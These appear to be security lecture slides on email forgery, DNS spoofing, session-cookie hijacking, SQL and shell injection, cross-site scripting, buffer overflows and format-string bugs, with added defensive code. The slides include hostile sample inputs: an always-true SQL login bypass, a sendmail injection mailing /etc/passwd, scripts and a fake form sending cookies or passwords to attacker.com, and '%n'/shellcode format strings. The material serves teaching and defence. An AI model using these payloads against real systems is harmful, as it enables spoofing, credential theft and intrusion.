relaying the message
53. 53
SMTP Security Problems
Example
% telnet frogstar.hit.com.pk 25
Trying...
Connected to frogstar.hit.com.pk.
Escape character is ‘^[’.
220 frogstar.hit.com.pk ESMTP Sendmail 8.11.6/8.11.6;
Mon, 10 Feb 2003 14:23:21 +0100
helo abcd.com.pk
250 frogstar.hit.com.pk Hello [152.66.249.32], pleased to meet you
mail from: bill.gates@microsoft.com
250 2.1.0 bill.gates@microsoft.com... Sender ok
rcpt to: user@ebizlab.hit.com.pk
250 2.1.5 user@ebizlab.hit.com.pk... Recipient ok
data
354 Enter mail, end with "." on a line by itself
Your fake message goes here.
.
250 2.0.0 h1ADO5e21330 Message accepted for delivery
quit
221 frogstar.hit.com.pk closing connection
Connection closed by foreign host.
%
54. 54
Be Careful, Though!
Return-Path: <bill.gates@microsoft.com>
Received: from frogstar.hit.com.pk (root@frogstar.hit.com.pk
[152.66.248.44])
by shamir.ebizlab.hit.com.pk (8.12.7/8.12.7/Debian-2)
with ESMTP id h1ADSsxG022719
for <user@ebizlab.hit.com.pk>; Mon, 10 Feb 2003 14:28:54 +0100
Received: from abcd.com.pk ([152.66.249.32])
by frogstar.hit.com.pk (8.11.6/8.11.6) with SMTP id h1ADO5e21330
for user@ebizlab.hit.com.pk; Mon, 10 Feb 2003 14:25:41 +0100
Date: Mon, 10 Feb 2003 14:25:41 +0100
From: bill.gates@microsoft.com
Message-Id: <200302101325.h1ADO5e21330@frogstar.hit.com.pk>
To: undisclosed-recipients:;
X-Virus-Scanned: by amavis-dc
Status:
Your fake message goes here.
56. 56
DNS – Domain Name Server
• The DNS is a distributed database that
provides mapping between hostnames and
IP addresses
• The DNS name space is hierarchical
– Top level domains: com, edu, gov, int, mil,
net, org, ae, …, pk, … zw
– Top level domains may contain second
level domains
e.g., edu within pk, co within uk, …
– Second level domains may contain third
level domains, etc.
57. 57
Domain Name Server
• Usually (not always) a name server knows
the IP address of the top level name
servers
• If a domain contains sub-domains, then the
name server knows the IP address of the
sub-domain name servers
• When a new host is added to a domain, the
administrator adds the (hostname, IP
address) mapping to the database of the
local name server
58. 58
DNS – Domain Name Server
– A single DNS reply may include several
(hostname, IP address) mappings (Resource
Records)
– Received information is cached by the name
server
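[Figure: the application asks the local name srv “ce.case.edu.pk = ?”; the local name srv asks the top level name srv “ce.case.edu.pk = ?” and receives the IP of the ns in pk, then continues through the name srv in pk, in edu.pk and in case.edu.pk; the answer shown is 152.66.248.44]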
59. 59
DNS spoofing
• The cache of a DNS name server is
poisoned with false information
• How to do it?
– Assume that the attacker wants
www.anything.com.pk to map to his own
IP address 152.66.249.32
60. 60
DNS Spoofing - Approach 1
• Attacker submits a DNS query
“www.anything.com.pk=?” to
ns.victim.com.pk
• A bit later it forges a DNS reply
“www.anything.com.pk=152.66.249.32”
• UDP makes forging easier but the
attacker must still predict the query
ID
61. 61
DNS Spoofing – Approach 2
• Attacker has access to ns.attacker.com.pk
– The attacker modifies its local name server such that it responds to a query “www.attacker.com.pk=?” with “www.anything.com.pk=152.66.249.32”
– The attacker then submits a query
“www.attacker.com.pk=?” to ns.victim.com.pk
– ns.victim.com.pk sends the query
“www.attacker.com.pk=?” to ns.attacker.com.pk
– ns.attacker.com.pk responds with
“www.anything.com.pk=152.66.249.32”
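How a caching resolver can refuse both approaches, as an added example (not code from the slides or from any DNS server): an unpredictable query ID plus reply matching addresses Approach 1, and a bailiwick check that drops records outside the zone the answering server is responsible for addresses Approach 2. The class and function names and the 203.0.113.x addresses are constructed for this illustration; production resolvers also randomize the source port, since a 16-bit ID alone is small.

```python
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class PendingQuery:
    txid: int          # 16-bit query ID, chosen unpredictably
    qname: str
    server_ip: str     # where the query was sent
    server_zone: str   # zone that server was delegated


@dataclass(frozen=True)
class Reply:
    txid: int
    qname: str
    source_ip: str
    records: tuple     # ((owner_name, ip), ...) as received


def norm(name):
    """Compare DNS names case-insensitively and without the trailing dot."""
    return name.lower().rstrip(".")


def new_query(qname, server_ip, server_zone):
    # secrets, not a counter: a forged reply must guess the ID blind.
    return PendingQuery(secrets.randbelow(1 << 16), norm(qname),
                        server_ip, norm(server_zone))


def in_bailiwick(name, zone):
    """True only if name is the zone itself or a proper subdomain of it."""
    name, zone = norm(name), norm(zone)
    return name == zone or name.endswith("." + zone)


def cacheable_records(pending, reply):
    """Return only the records that are safe to put in the cache."""
    if reply.txid != pending.txid:
        return []                      # Approach 1: wrong or guessed ID
    if reply.source_ip != pending.server_ip:
        return []                      # reply did not come from the queried server
    if norm(reply.qname) != pending.qname:
        return []                      # answers a question we did not ask
    # Approach 2: ns.attacker.com.pk may speak for attacker.com.pk only,
    # so its claim about www.anything.com.pk is discarded.
    return [(owner, ip) for owner, ip in reply.records
            if in_bailiwick(owner, pending.server_zone)]
```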
63. 63
Web Security – Browser
Side Risks
• Obtaining a valid browser
– IE usually comes with the OS
– Netscape can be obtained from web sites
– How can you be sure that you are downloading a
genuine copy? (remember DNS spoofing)
– A fake browser can look like a genuine one, but
it can
• Obtain and send passwords typed in by the user
• Downgrade browser security (e.g., reduce key length
used in SSL)
64. 64
Web Forms
• Used to send data from the user to the
server (e.g., online applications, queries to a
database, etc.)
• If pure HTTP is used, then the data is sent
in clear
• Sensitive information can be eavesdropped
and/or modified
65. 65
Helper Applications
• The browser cannot handle all kinds of downloaded data
• It invokes an external program (the helper)
on the user’s machine with the downloaded
data as parameter
• e.g., to display a PostScript file, it may
pass it to GhostView
• Downloaded content can be dangerous (e.g.,
MS Word and Excel files may contain
macro viruses)
66. 66
Mobile Code
Java Applets
• Normally run within a controlled
environment (sandbox)
• Access to local resources is strictly
controlled by a security manager
• However, an applet may escape from the
sandbox due to some bugs in the
implementation of the Java Virtual
Machine
• Several such bugs have been discovered,
reported, and fixed
• What guarantees that there’s no more?
67. 67
ActiveX Controls
• A Microsoft approach to mobile code
• ActiveX controls are executables that run directly
on the machine (there’s no sandbox)
• ActiveX controls can be signed and declared safe
by their creators
• But an ActiveX control declared safe may turn out
to be dangerous
– Compaq signed a control safe which allowed for remote
management of servers
– Microsoft signed a control which could write an arbitrary file on the hard disk (it was exploited by the Kak.Worm virus)
68. 68
JavaScript != Java Applet
• Scripts are interpreted by the browser itself
• Not as powerful as Java (e.g., many attacks
require that the user clicks on a button to activate
the malicious code)
• Successful attacks reported include history
tracking, stealing files, helping Java applets to
bypass firewalls, etc.
69. 69
Cookies
• A cookie is a (name, value) pair
• Cookies are set by web servers and stored by web
browsers
• A cookie set by a server is sent back to the server
when the browser visits the server again
• Used to create “HTTP sessions” (session state
information is stored in cookies)
70. 70
Cookies: Example
• If cookies are sent in clear, then they can be
eavesdropped and used to hijack an “HTTP
session”
• Cookies can be used to track what sites the user
visits (can lead to serious privacy violation!)
– Many sites use third party advertisements
– The third party can set a cookie that identifies the user
client → server: get index.html
server → client: content of index.html + set-cookie: sessionID=123456789
client → server: get nextlink.html + cookie: sessionID=123456789
…
71. 71
Cookies: Example
• This cookie is sent to the third party each time an
ad is downloaded by the user’s browser along with
the address of the page that contains the link to
the ad (the “referrer” field of the HTTP header
contains this address)
index.html (served by whatever.com to the browser):
<html>
…
<img src="http://thirdparty.com/ad_server.asp">
…
</html>
browser → thirdparty.com: get ad_server.asp + referrer=“whatever.com/index.html” + cookie: user=123456789
72. 72
Case-study: home-banking application
-- Authentication process --
[1] Mario Rossi → Web Application: https://www.mia-banca.it
[2] Web Application → Mario Rossi: Send authentication form over HTTPS
73. 73
Case-study: home-banking application
-- Authentication process --
[1] Mario Rossi → Web Application: https://www.mia-banca.it
[2] Web Application → Mario Rossi: Send authentication form over HTTPS
[3] Mario Rossi → Web Application: Insert username/password via HTTPS
Web Application: Credential verify: if ok, client authenticated; Cookie generation
[4] Web Application → Mario Rossi: Personal Welcome page and Set Cookie (authentication token: Cookie=TWFyaW8123)
74. 74
Case-study: home-banking application
-- Following request --
[5] Mario Rossi → Web Application: Request “movimenti”, Cookie=TWFyaW8123 (authentication token)
Web Application: Cookie verifying: identify user, send data to user
[6] Web Application → Mario Rossi: Response with user data
75. 75
Audit: cookies collection
-- Authentication process --
[3] Mario Rossi → Web Application: Insert username/password via HTTPS
Web Application: Credential verify: if ok, client authenticated; Cookie generation
[4] Web Application → Mario Rossi: Welcome page and Set Cookie=TWFyaW8123 (authentication token)
76. 76
Audit: cookies collection (2)
1st Authentication: User = Mario Rossi; password=12aB45cD: Cookie=TWFyaW8123
2nd Authentication: User = Mario Rossi; password=12aB45cD: Cookie=TWFyaW8125
3rd Authentication: User = Mario Rossi; password=12aB45cD: Cookie=TWFyaW8127
Cookie Guessable: Cookie=TWFyaW8129
77. 77
Session web hacking: identity theft
-- Following request --
[5] Mario Rossi → Web Application: Request “movimenti”, Cookie=TWFyaW8179 (authentication token)
Web Application: Cookie verify: TWFyaW8179; identify user Mario Verdi; send Mario Verdi data
[6] Web Application → Mario Rossi: Send Mario Verdi data
78. 78
Possible solutions
For a robust session management, it is necessary to protect:
• User credentials AND
• User authentication token (cookie, session ID)
Authentication token should be:
• Unique for each session
• Not predictable
• Resistant to reverse-engineering
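The audit from the case study, turned into a check a tester can run over collected cookies, followed by a token generator that meets the three requirements above. This is an added example, not code from the slides; the function names are hypothetical and the sample cookies are the ones shown on the audit slide.

```python
import base64
import re
import secrets

# Trailing decimal digits of a token, with whatever precedes them.
TRAILING_DIGITS = re.compile(r"^(.*?)(\d+)$", re.S)


def predict_next(tokens):
    """Return the next token if the samples form a counter, else None.

    Flags tokens that share a fixed prefix and whose trailing digits
    advance by a constant step, the pattern seen in the audit.
    """
    matches = [TRAILING_DIGITS.match(t) for t in tokens]
    if len(tokens) < 3 or not all(matches):
        return None
    prefixes = {m.group(1) for m in matches}
    values = [int(m.group(2)) for m in matches]
    steps = {b - a for a, b in zip(values, values[1:])}
    if len(prefixes) != 1 or len(steps) != 1 or steps == {0}:
        return None
    width = len(matches[-1].group(2))
    return f"{prefixes.pop()}{values[-1] + steps.pop():0{width}d}"


def leaks_username(token, username):
    """True if the token embeds the user name in clear or as a Base64 prefix.

    "TWFyaW8" is Base64 for "Mario" without padding, so the audited cookie
    can be reverse-engineered into identity plus counter.
    """
    encoded = base64.b64encode(username.encode()).decode().rstrip("=")
    return username in token or token.startswith(encoded)


def new_session_token():
    """256 bits from the OS CSPRNG: unique per session, unpredictable, opaque.

    The server keeps the token-to-user mapping; nothing about the user is
    encoded in the value itself.
    """
    return secrets.token_urlsafe(32)
```

Run `predict_next` over a handful of cookies gathered from repeated logins of a test account; any non-`None` result means another user's session can be guessed the way the slide shows.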
79. 79
Cookies: Example
• http://www.musicvision.com/network_privacy_policy.html
Third Party Advertising
We use Maxworldwide and other third-party advertising companies to serve ads
when you visit our Web site. These companies may use information (not including
your name, address, email address or telephone number) about your visits to
this and other Web sites in order to provide advertisements on this site and
other sites about goods and services that may be of interest to you. If you would
like more information about this practice and to know your choices about not
having this information used by these companies, please click here
Third Party Cookies
In the course of serving advertisements to this site, our third-party advertiser
may place or recognize a unique "cookie" on your browser.
84. 84
URL Manipulation (contd)
• GET request sends important parameters on the URL
• The parameters can be manipulated to give undesired results
• The GET requests are stored in the browser history
• Impact is HIGH
• Variants work on any user input on web page, hidden values
or information stored in cookies.
http://www.paladiontest.com/example?accountnumber=12345&debitamount=1
85. 85
URL Manipulation - Solution
• The best solution is to avoid sending
critical parameters in a query string
• Validate with session token
• All sensitive data sent in the query string
must be cryptographically protected.
86. 86
Web Security – Server Side
Risks
• Interactive web sites are based on forms
and scripts
– Forms are written in html
– The user fills the form and clicks on a button to
submit it
– This creates a request to the server that
contains the data typed in by the user
– The request launches a script on the server
that processes the data supplied by the user
(may return a page that is created using the
supplied data)
87. 87
Unexpected User Input
• Unexpected user input may have
unexpected effects
– Special characters
– Too much data (may cause buffer overflow)
• At best, the server crashes
• At worst, the attacker gains control over
the server
88. 88
Unexpected User Input:
Example I
• An example: password based user authentication
– Assume the following server side script is used to check the supplied username and password:
query$ = 'SELECT name, pass FROM database WHERE name = "' + name$ + '" AND pass = "' + pass$ + '"'
Result = SQLquery(query$)
if Result <> 0 then OK
– With name$ = username and pass$ = passwd
SELECT name, pass FROM database WHERE name = "username" AND pass = "passwd"
– With name$ = username" OR TRUE OR name = " and pass$ = passwd
SELECT name, pass FROM database WHERE name = "username" OR TRUE OR name = "" AND pass = "passwd"
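The slide's login check next to its parameterized form, as an added example using Python's built-in sqlite3 (not code from the slides). The table name `users`, the function names and the sample row are constructed; the input uses single quotes and `OR 1=1` where the slide uses double quotes and `OR TRUE`, because that is the portable SQLite spelling.

```python
import sqlite3


def make_db():
    """In-memory database with one constructed account.

    The password is stored in clear only to mirror the slide's query;
    a real application stores a salted password hash.
    """
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, pass TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("username", "passwd"))
    return db


def login_vulnerable(db, name, password):
    """The slide's pattern: user input is pasted into the SQL text."""
    query = ("SELECT name, pass FROM users WHERE name = '" + name
             + "' AND pass = '" + password + "'")
    return db.execute(query).fetchone() is not None


def login_parameterized(db, name, password):
    """Same check with bound parameters: input is data, never SQL syntax."""
    row = db.execute(
        "SELECT name FROM users WHERE name = ? AND pass = ?",
        (name, password),
    ).fetchone()
    return row is not None


# Constructed input following the slide: it closes the string literal and
# adds an always-true OR branch, so the WHERE clause matches every row.
SLIDE_STYLE_NAME = "username' OR 1=1 OR name = '"


def demo():
    db = make_db()
    return {
        "vulnerable_accepts_injection": login_vulnerable(db, SLIDE_STYLE_NAME, "wrong"),
        "parameterized_accepts_injection": login_parameterized(db, SLIDE_STYLE_NAME, "wrong"),
        "parameterized_accepts_valid": login_parameterized(db, "username", "passwd"),
    }
```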
90. 90
Unexpected User Input:
Example II
• User can type her e-mail address in a form and the server sends her the latest public company report
– Assume the following perl script is used on the server
system("sendmail $address < report.doc");
– With $address = username@case.edu.pk
system("sendmail username@case.edu.pk < report.doc");
– With $address = username@case.edu.pk < /etc/passwd | sendmail username@case.edu.pk
system("sendmail username@case.edu.pk < /etc/passwd | sendmail username@case.edu.pk < report.doc");
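The same report mailer written so that the address can never reach a shell, as an added example (not code from the slides): the input is validated against an allow-list pattern and passed as one argv element, and the report is attached as standard input by the program rather than by a shell redirection. The address pattern, the function names and the injectable `runner` parameter are assumptions of this example.

```python
import re
import subprocess

# Conservative allow-list for an address; deliberately stricter than RFC 5322.
ADDRESS = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+")


def shell_string_vulnerable(address):
    """What the slide's script hands to the shell: input becomes shell syntax."""
    return f"sendmail {address} < report.doc"


def sendmail_argv(address):
    """Validate the address and return an argument vector, never a string."""
    if not ADDRESS.fullmatch(address) or address.startswith("-"):
        # Rejects spaces, <, |, ; and a leading dash that would be
        # read as a command-line option.
        raise ValueError("rejected e-mail address")
    return ["sendmail", address]


def send_report(address, report_path, runner=subprocess.run):
    """Run sendmail without a shell; the file is opened here, not by '<'."""
    argv = sendmail_argv(address)
    with open(report_path, "rb") as report:
        return runner(argv, stdin=report, shell=False, check=True)


# The second input from the slide, kept as data for the check below.
SLIDE_INPUT = ("username@case.edu.pk < /etc/passwd | "
               "sendmail username@case.edu.pk")


def is_rejected(address):
    try:
        sendmail_argv(address)
    except ValueError:
        return True
    return False
```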
91. 91
Cross Site Scripting Example
[Figure: reflected cross-site scripting between User, Bank.com and Attacker.com]
– User requests http://bank.com/login/ and receives Webpage + Cookies (Internet Banking Cookie)
– Attacker.com supplies a malicious link on webpage or email with malicious link
– Malicious Link: http://bank.com/account.jsp? <SCRIPT>Send cookie to attacker.com
– Reflected Code: <SCRIPT>Send Cookie to attacker.com</SCRIPT>
– Executed: Internet Banking Cookie goes to Attacker.com
92. 92
Cross Site Scripting
• Attacker arranges that the victim receives
a malicious script from a trusted server
• Example:
– UserX places the script in the “guest
book” of UserB
– UserA visits the “guest book” of UserB
– His browser downloads and runs UserX’s
script
93. 93
Cross Site Scripting:
Example
• When a non-existent file such as abcd.html is requested,
some web servers return error messages
like:
“The requested file abcd.html cannot be found on the server.”
– Attacker can place the following link on a page:
< a href=“http://trusted.server.com/is protected. The server
needs you to login.<br><form
action="http://attacker.com/cgiscript.cgi"
method="post">Username: <input
type="text"
name="name"><br>Password: <input
type="password"
name="pass"><br><input type="submit"
value="Login"></form><br><br><br><br><br><br><br>
<br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>”
>
94. 94
What Will Happen?
• Alice clicks on the link
• HTTP request is sent to trusted.server.com
• Server returns the usual error page, but it will
look like a login window...
[Figure: browser window showing]
The requested file is protected. The server needs you to log in.
Username:
Password:
Login
cannot be found on the server.
95. 95
Cross-Site Scripting
Defenses
• Remove from user input all characters that
are meaningful in scripting languages:
– =<>"'();
– You must do this filtering on the server side
– You cannot do this filtering using JavaScript on
the client, because the attacker can get around
such filtering
96. 96
Cross-Site Scripting
Defenses (cont..)
• More generally, on the server-side, your
application must filter user input to
remove:
– Quotes of all kinds (', ", and `)
– Semicolons (;), Asterisks (*), Percents (%),
Underscores (_)
– Other shell/scripting metacharacters
(=&|*?~<>^()[]{}$\n\r)
• Define characters that are ok (alpha and
numeric), and filter everything else out
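The error page from the earlier cross-site scripting example, rendered on the server with the requested name HTML-encoded before it is reflected. This is an added example, not code from the original slides; it shows output encoding as a complement to the character filtering listed above, and the function names are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Append text to the NUL-terminated string in out; -1 if it does not fit. */
static int append(char *out, size_t outsz, const char *text)
{
    size_t used = strlen(out), n = strlen(text);

    if (used + n + 1 > outsz)
        return -1;
    memcpy(out + used, text, n + 1);
    return 0;
}

/* Append s with the five HTML-significant characters entity-encoded. */
static int append_escaped(char *out, size_t outsz, const char *s)
{
    for (; *s != '\0'; s++) {
        char one[2] = { *s, '\0' };
        const char *rep = one;

        switch (*s) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        if (append(out, outsz, rep) != 0)
            return -1;
    }
    return 0;
}

/* Server-side rendering of the error message with the name encoded. */
int render_not_found(char *page, size_t pagesz, const char *requested)
{
    if (page == NULL || pagesz == 0 || requested == NULL)
        return -1;
    page[0] = '\0';
    if (append(page, pagesz, "The requested file ") != 0 ||
        append_escaped(page, pagesz, requested) != 0 ||
        append(page, pagesz, " cannot be found on the server.") != 0) {
        page[0] = '\0';   /* never emit a half-built page */
        return -1;
    }
    return 0;
}
```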
97. 97
Buffer overflows
• Extremely common bug.
– First major exploit: 1988 Internet Worm. fingerd.
• 15 years later: 50% of all CERT advisories:
– 1998: 9 out of 13
– 2001: 14 out of 37
– 2003: 13 out of 28
• Often leads to total compromise of host.
98. 98
What are buffer overflows?
• Suppose a web server contains a function:
    void func(char *str) {
        char buf[128];
        strcpy(buf, str);      /* no length check: copies until the NUL in str */
        do_something(buf);
    }
• When the function is invoked the stack looks like:
[Figure: stack, from the top of the stack: buf, sfp, ret-addr, str]
• What if *str is 136 bytes long? After strcpy:
[Figure: stack, from the top of the stack: *str, ret, str]
99. 99
Possible Results of Buffer Overruns
Possible Result | Hacker's Goal
Access violation | To perform denial of service attacks against servers
Instability | To disrupt the normal operation of software
Code Injection | To gain privileges for their own code; to exploit vital business data; to perform destructive actions
100. 100
Stack-Based Buffer Overrun Example
    void UnSafe (const char* uncheckedData)
    {
        char localVariable[4];
        int anotherLocalVariable;
        strcpy (localVariable, uncheckedData);   /* writes past localVariable when the input is longer */
    }
[Figure: stack, from the top of the stack: char[4], int, return address]
101. 101
Heap Overruns
• Overwrite data stored on the heap
• Are harder to exploit than a buffer
overrun
[Figure: heap holding Data and Pointer blocks, with a strcpy writing xxxxxxx across them]
102. 102
Preventing overflow attacks
• Main problem:
– strcpy(), strcat(), sprintf() have no range checking.
– “Safe” versions strncpy(), strncat() are misleading
• strncpy() may leave buffer unterminated.
• strncpy(), strncat() encourage off by 1 bugs.
• Defenses:
– Type safe languages (Java, ML). Legacy code?
– Mark stack as non-execute. Random stack location.
– Static source code analysis.
– Run time checking: StackGuard, Libsafe, SafeC, (Purify).
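The strncpy() and off-by-one pitfalls named above, next to a copy helper that refuses input that does not fit. This is an added example and not part of the original slides; copy_checked, append_checked and func_checked are hypothetical names, and func_checked is the earlier func() with the missing length check.

```c
#include <stddef.h>
#include <string.h>

/* Pitfall from the slide: with n == capacity, strncpy() writes no NUL when
 * src has n or more characters. Returns 1 if dst ended up unterminated. */
int strncpy_unterminated(const char *src)
{
    char dst[8];
    memset(dst, 'X', sizeof dst);
    strncpy(dst, src, sizeof dst);
    return memchr(dst, '\0', sizeof dst) == NULL;
}

/* Copy that either fits completely, terminator included, or is refused. */
int copy_checked(char *dst, size_t dstsz, const char *src)
{
    size_t len = 0;

    if (dst == NULL || dstsz == 0 || src == NULL)
        return -1;
    while (len < dstsz && src[len] != '\0')
        len++;
    if (len == dstsz) {              /* src plus its NUL needs more room */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

/* Append with the bound that strncat() callers often get wrong by one:
 * the room left is capacity - current length - 1 (for the terminator). */
int append_checked(char *dst, size_t dstsz, const char *src)
{
    size_t used = strlen(dst);       /* dst must already be terminated */
    if (used >= dstsz)
        return -1;
    return copy_checked(dst + used, dstsz - used, src);
}

/* The slide's func() with the length check that strcpy() lacks. */
int func_checked(const char *str)
{
    char buf[128];
    if (copy_checked(buf, sizeof buf, str) != 0)
        return -1;                   /* reject instead of overwriting sfp/ret */
    return (int)strlen(buf);         /* stand-in for do_something(buf) */
}
```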
103. 103
Marking stack as non-execute
• Basic stack exploit can be prevented by marking
stack segment as non-executable.
• Problems:
– Some apps need executable stack (e.g. LISP
interpreters).
104. 104
Run time checking: StackGuard
• Many run-time checking techniques exist …
– Here, only discuss methods relevant to overflow protection.
• Solution 1: StackGuard (WireX)
– Run time tests for stack integrity.
– Embed “canaries” in stack frames and verify their
integrity prior to function return.
[Figure: two stack frames, Frame 1 and Frame 2; each holds, from the top of the stack: local, canary, sfp, ret, str]
105. 105
Canary Types
• Random canary:
– Choose random string at program startup.
– Insert canary string into every stack frame.
– Verify canary before returning from function.
– To corrupt random canary, attacker must learn
current random string.
• Terminator canary:
– Canary = 0, newline, linefeed, EOF
– String functions will not copy beyond terminator.
– Hence, attacker cannot use string functions to
corrupt stack.
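Why a terminator canary holds up against string copies, shown on a constructed model of a stack frame (a flat array, not the real stack). This is an added example and not part of the original slides; the frame sizes, the canary byte order and all names are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Constructed model of one stack frame as a flat array: [buf][canary][ret].
 * Nothing here touches the real stack. */
enum { BUF_LEN = 8, CANARY_LEN = 4, RET_LEN = 4,
       FRAME_LEN = BUF_LEN + CANARY_LEN + RET_LEN };

/* Terminator canary: NUL, CR, LF, EOF (byte order is an assumption). */
static const unsigned char CANARY[CANARY_LEN] = { 0x00, 0x0d, 0x0a, 0xff };
static const unsigned char SAVED_RET[RET_LEN] = { 'R', 'E', 'T', 'A' };

struct frame { unsigned char bytes[FRAME_LEN]; };

static void frame_enter(struct frame *f)      /* function prologue */
{
    memset(f->bytes, 0, BUF_LEN);
    memcpy(f->bytes + BUF_LEN, CANARY, CANARY_LEN);
    memcpy(f->bytes + BUF_LEN + CANARY_LEN, SAVED_RET, RET_LEN);
}

/* strcpy() semantics with no length check: copy through the first NUL.
 * Clamped to the model so the demonstration itself stays in bounds. */
static void model_strcpy(struct frame *f, const unsigned char *src, size_t n)
{
    size_t i;

    for (i = 0; i < n && i < FRAME_LEN; i++) {
        f->bytes[i] = src[i];
        if (src[i] == '\0')
            break;
    }
}

/* Result bits: 1 = canary check fails at function return (program stops),
 * 2 = saved return address was changed. */
int copy_and_check(const unsigned char *src, size_t n)
{
    struct frame f;
    int result = 0;

    frame_enter(&f);
    model_strcpy(&f, src, n);
    if (memcmp(f.bytes + BUF_LEN, CANARY, CANARY_LEN) != 0)
        result |= 1;
    if (memcmp(f.bytes + BUF_LEN + CANARY_LEN, SAVED_RET, RET_LEN) != 0)
        result |= 2;
    return result;
}
```

An input that tries to carry the canary bytes along is cut off at the canary's NUL, so the result is never 2 alone: the return address cannot change while the canary check still passes.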
106. 106
StackGuard (Cont.)
• StackGuard implemented as a GCC patch.
– Program must be recompiled.
• Minimal performance effects: 8% for Apache.
• Newer version: PointGuard.
– Protects function pointers and setjmp
buffers by placing canaries next to them.
– More noticeable performance effects.
– Note: Canaries don’t offer foolproof protection.
– Some stack smashing attacks can leave canaries
untouched.
107. 107
StackGuard variants - ProPolice
• ProPolice (IBM) - gcc 3.4.1.
– Rearrange stack layout to prevent ptr overflow.
[Figure: ProPolice stack layout: args (no arrays or pointers), ret addr, SFP, CANARY, arrays, local variables (ptrs, but no arrays); arrows show the directions of stack growth and string growth]
108. 108
Run time checking: Libsafe
• Solution 2: Libsafe (Avaya Labs)
– Dynamically loaded library.
– Intercepts calls to strcpy (dest, src)
• Validates sufficient space in current stack frame:
|frame-pointer – dest| > strlen(src)
• If so, does strcpy.
Otherwise, terminates application.
[Figure: stack showing the libsafe frame (sfp, ret-addr, dest, src) nearest the top of the stack and main's frame (buf, sfp, ret-addr) beyond it]
110. 110
Format string problem
    int func(char *user) {
        fprintf( stdout, user);
    }
Problem: what if user = "%s%s%s%s%s%s%s" ??
– Most likely program will crash: DoS.
– If not, program will print memory contents. Privacy?
– Full exploit using user = "%n"
Correct form:
    int func(char *user) {
        fprintf( stdout, "%s", user);
    }
111. 111
Vulnerable functions
Any function using a format string.
Printing:
printf, fprintf, sprintf, …
vprintf, vfprintf, vsprintf, …
Logging:
syslog, err, warn
112. 112
Overflow using format string
    char errmsg[512], outbuf[512];
    sprintf (errmsg, "Illegal command: %400s", user);
    sprintf( outbuf, errmsg );
• What if user = "%500d <nops> <shellcode>"
– Bypass "%400s" limitation.
– Will overflow outbuf.
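A hardened form of the two sprintf() calls above, together with a counter that flags conversion directives in untrusted input. This is an added example and not part of the original slides; format_error and count_format_directives are hypothetical names.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hardened form of the two sprintf() calls on the slide. Untrusted text is
 * only ever an argument, never the format string, and every write is
 * bounded by the destination size. Note "%.400s": the precision caps how
 * many characters are taken, whereas a width such as "%400s" only pads.
 * Returns the message length, or -1 if it did not fit. */
int format_error(char *outbuf, size_t outsz, const char *user)
{
    char errmsg[512];
    int n;

    if (outbuf == NULL || outsz == 0 || user == NULL)
        return -1;
    n = snprintf(errmsg, sizeof errmsg, "Illegal command: %.400s", user);
    if (n < 0 || (size_t)n >= sizeof errmsg)
        return -1;
    n = snprintf(outbuf, outsz, "%s", errmsg);   /* errmsg is data here */
    if (n < 0 || (size_t)n >= outsz) {
        outbuf[0] = '\0';                        /* do not return a cut message */
        return -1;
    }
    return n;
}

/* Counts '%' conversion introducers in untrusted text ("%%" is skipped).
 * Useful as a logging or alerting signal, not as a substitute for the fix. */
int count_format_directives(const char *user)
{
    int count = 0;
    const char *p = user;

    while ((p = strchr(p, '%')) != NULL) {
        if (p[1] == '%') {
            p += 2;             /* "%%" is a literal percent sign */
        } else {
            count++;
            p++;
        }
    }
    return count;
}
```

GCC's -Wformat -Wformat-security options report the fprintf(stdout, user) pattern at compile time.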